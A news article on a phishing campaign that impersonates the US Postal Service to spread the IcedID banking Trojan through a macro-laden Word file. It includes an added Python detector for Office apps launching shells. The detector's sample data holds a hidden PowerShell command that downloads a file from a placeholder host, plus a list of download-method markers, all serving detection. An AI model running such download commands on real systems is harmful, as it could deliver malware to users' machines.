A new phishing campaign is making the rounds across the US, looking to trick unsuspecting victims into installing a banking Trojan onto their machines. Last week, cybersecurity experts from Proofpoint discovered a campaign in which hackers impersonate the US Postal Office as they try to distribute the IcedID banking Trojan.
This is an already known campaign, previously spotted in Europe, where criminals impersonated the German Ministry of Finance and told their victims they were eligible for a tax refund of almost €700. Back then, they were targeting financial companies and IT services companies.
As before, the criminals used a lookalike .com site, verbiage, and stolen branding in emails to push the IcedID banking Trojan. The targets are a bit different this time around, however, as these emails were intended mostly for the healthcare vertical.
The scam emails carried a malicious Word file which, when opened, would trigger an Office macro and launch a PowerShell script. That script would download and install the IcedID Trojan.
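The chain described above (Word document, macro, PowerShell, download) leaves a recognizable parent/child process pattern on the endpoint. The following is an added example, not part of the original article or Proofpoint's research: a small detector over process-creation events. The event shape, host names, process lists and marker strings are assumptions chosen for illustration, and the check is generalized slightly beyond the article to cover other Office applications and `cmd.exe`.

```python
import ntpath

# Assumed lists for illustration; tune to your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile",
                    "net.webclient", "start-bitstransfer")

# Constructed sample events (shape loosely modeled on process-creation logs).
SAMPLE_EVENTS = [
    {"host": "ws-01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden "
                "Invoke-WebRequest -Uri http://example.invalid/p -OutFile p.bin"},
    {"host": "ws-02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem"},
    {"host": "ws-03",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 8192"},
    {"host": "ws-04",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

def exe_name(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()

def detect_office_shell_spawn(events):
    """Flag shells started by an Office app; 'high' if the command line fetches content."""
    alerts = []
    for ev in events:
        if exe_name(ev["parent"]) not in OFFICE_PARENTS:
            continue
        child = exe_name(ev["image"])
        if child not in SHELL_CHILDREN:
            continue  # ordinary Office helper processes are ignored
        cmd = ev["cmdline"].lower()
        markers = [m for m in DOWNLOAD_MARKERS if m in cmd]
        alerts.append({"host": ev["host"], "child": child, "markers": markers,
                       "severity": "high" if markers else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect_office_shell_spawn(SAMPLE_EVENTS):
        print(alert)
```

Encoded or obfuscated command lines will not match the plain-text markers, so the parent/child relationship alone is still reported at medium severity.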
After tracking countless emails across the web in search of the source, Proofpoint says that this campaign most likely originates from a completely new actor.
"Although these campaigns are small in volume, currently, they are significant for their abuse of trusted brands, including government agencies, and for their relatively rapid expansion across multiple geographies," commented threat intelligence lead at Proofpoint, Christopher Dawson.
"To date, the group appears to have targeted organizations in Germany, Italy, and, most recently, the United States, delivering geotargeted payloads with lures in local languages. We will be watching this new actor closely, given their apparent global aspirations, well-crafted social engineering, and steadily increasing scale."